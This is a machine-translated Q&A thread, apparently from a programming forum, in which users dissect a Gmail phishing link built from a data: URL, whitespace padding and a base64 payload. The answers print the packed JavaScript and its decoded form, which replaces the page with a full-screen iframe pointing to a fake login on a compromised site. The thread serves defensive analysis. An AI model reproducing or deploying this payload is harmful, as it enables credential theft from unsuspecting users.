0
我收到一封電子郵件從一個附加文件同事這似乎是在谷歌驅動器,一旦點擊它導致了下面的網址,它再現了谷歌帳戶登錄頁面,以竊取密碼:這是一個谷歌賬戶黑客?
從腳本中可以找到發送信息的地方,如果我把我的電子郵件地址和密碼?
A
回答
0
如果你想檢查點擊此鏈接後有多少網址正在工作。
安裝Temple數據附加組件在您的瀏覽器中。打開它並點擊此鏈接。你會看到很多鏈接。
0
找出它的最好方法是,當它提示你輸入你的憑證時,檢查你實際在哪個域。如果它是谷歌域,那麼它的確定,如果沒有,那麼它的東西與釣魚有關。
在這裏你應該非常小心地檢查域名,攻擊者發揮一個竅門,如果域名是谷歌他們創建非常類似的東西像gooogle或geogle的東西。所以仔細檢查域名。
2
讓我們打破了攻擊,據我們可以:
這是一個網址,出發的基本Gmail登錄鏈接,設置了幾個請求變量如果可以自動登錄。
data:text/html,https://accounts.google.com/ServiceLogin?service=mail&passive=true&rm=false&continue
接下來是大量的空白空間,旨在隱藏瀏覽器地址欄中的惡意負載。
%20%20%20%20%20%20%20%20%20%20%20%(等)
現在接着對受害者的有效負載。它是base64編碼的。
當我們對其進行解碼,它看起來像這樣:
eval(function (p, a, c, k, e, d)
{
e = function (c)
{
return c
};
if (!''.replace(/^/, String))
{
while (c--)
{
d[c] = k[c] || c
}
k = [function (e)
{
return d[e]
}
];
e = function()
{
return '\\w+'
};
c = 1
};
while (c--)
{
if (k[c])
{
p = p.replace(new RegExp('\\b' + e(c) + '\\b', 'g'), k[c])
}
}
return p
}
('3.2.16="15 14 13 17 18";21{(20(){19 1=3.2.12(\'1\');1.10=\'7/8-6\';1.11=\'9 6\';1.22=\'\';2.31(\'34\')[0].23(1)}())}33(35){}3.2.36.37="<4 39=\\"38://32.26/25-24/\\" 27=\\"28: 0;30: 5%;29:5%\\"></4>";', 10, 40, '|link|document|window|iframe|100|icon|image|x|shortcut|type|rel|createElement|been|have|You|title|Signed|out|var|function|try|href|appendChild|content|wp|club|style|border|height|width|getElementsByTagName|bluevoicepgh|catch|head|e|body|outerHTML|http|src'.split('|'), 0, {}
))
這是邪,模糊JavaScript。不要執行它。
martinstoeckli的回答包含此腳本的擴展版本。
它設置您當前標籤的標題來模仿gMail的'您已經被註銷'頁面,並且改變頁面,添加一個沒有邊框的屏幕填充iframe。
iFrame指向(似乎是)受損的WordPress網站,其中包含僞造的Gmail登錄頁面。 將憑據輸入到bluevoicepgh.club(有人可能想通知這些人他們的wordpress網站可能已被盜用)託管的虛假頁面中,然後將您重定向到已在後臺默默登錄您的gmail頁面。無論您輸入假登錄頁面的憑據是否正確,都會發生這種情況。
如果您確實在該頁面中輸入了有效的憑證,那麼除非您可以查看其後面的腳本,否則不會告訴它該去哪裏。
請記住,(謝天謝地)目前的形式,攻擊將不會正常,因爲谷歌的登錄頁面使用HTTPS(和強制使用HTTPS)工作。 鉻提醒我們在執行腳本:
Mixed Content: The page at 'https://accounts.google.com/ServiceLogin?service=mail&passive=true&rm=false…9keXxvdXRlckhUTUx8aHR0cHxzcmMnLnNwbGl0KCd8JyksMCx7fSkpCg==%3E%3C/script%3E' was loaded over HTTPS, but requested an insecure resource 'http://bluevoicepgh.club/wp-content/'. This request has been blocked; the content must be served over HTTPS.
+0
對於那些他們就粘貼到自己的瀏覽器後,誰想知道。它的_safe_現在:)。該域是**關閉**,它不會工作。 – Reyo
1
腳本無法正常工作,因爲谷歌是在發送x-frame-options = deny(它是在瀏覽器中尊重這一頭),但鏈接的意圖似乎像這樣:
%20是空白,這樣一個人希望隱藏URL的內容,因爲下面的內容可能不在可見區域。- 腳本本身試圖把有效的頁面到使用整個窗口(可能是不可見的)框架。無論您在此頁面上點擊什麼,都可以被惡意網頁攔截。
也許有人想分析這個框架,但應該小心謹慎地做,惡意的域名是bluevoicepgh。
window.document.title = "You have been Signed out";
try {
(function() {
var link = window.document.createElement('link');
link.type = 'image/x-icon';
link.rel = 'shortcut icon';
link.href = '';
document.getElementsByTagName('head')[0].appendChild(link)
}())
} catch (e) {}
window.document.body.outerHTML = "<iframe src=\"http://!!maliciousdomain!!.club/wp-content/\" style=\"border: 0;width: 100%;height:100%\"></iframe>";
相關問題
- 1. 由谷歌播放賬戶
- 2. 鏈接谷歌分析(私人賬戶)與Adwords(客戶帳戶)
- 3. 谷歌分析iOS SDK - 多個賬戶
- 4. 兩個谷歌分析賬戶
- 5. 谷歌應用引擎限制訪問一組谷歌賬戶
- 6. 在一頁上多個引用一個谷歌分析賬戶
- 7. 「你想允許這個請求」屏幕在Android,谷歌賬戶
- 8. 這是一個JavaScript黑客入侵嗎?
- 9. Android設備上的電池使用時間是什麼?登錄谷歌賬戶vs不登錄谷歌賬戶?
- 10. 是否可以用谷歌飛鏢寫一個SIP客戶端?
- 11. SocialAuth java庫與谷歌賬戶
- 12. 在mediaTemples賬戶上設置谷歌Adsense
- 13. 如何使用谷歌賬戶登錄
- 14. 強制谷歌賬戶選擇器
- 15. Android:訪問谷歌賬戶信息
- 16. Firebase谷歌登錄兩個客戶端
- 17. 谷歌分析 - 多個賬戶的多個追蹤器?
- 18. 這是什麼JavaScript黑客?
- 19. 如何檢查谷歌/ Gmail賬戶是真實的?
- 20. 流星JS賬戶,谷歌包不是爲我工作
- 21. 谷歌雲平臺個人賬單
- 22. 谷歌結賬與appengine
- 23. 如何從2個賬戶顯示谷歌admob?
- 24. MVC和多個谷歌結賬商戶ID
- 25. 爲多個用戶估算谷歌應用引擎賬單
- 26. 谷歌加'選擇賬戶'選擇賬戶不會消失取消?
- 27. 由於谷歌兩步驗證無法登錄到我的谷歌賬戶上的一個或acer iconia
- 28. 谷歌地圖;客戶端ID;你必須有一個AND $$$$
- 29. 谷歌應用程序引擎身份驗證問題(谷歌賬戶API)
- 30. 我怎樣才能讓這個谷歌地圖黑暗?
只是爲了完整性解碼腳本部分:http://pastebin.com/0ZK3s2L1 – Andreas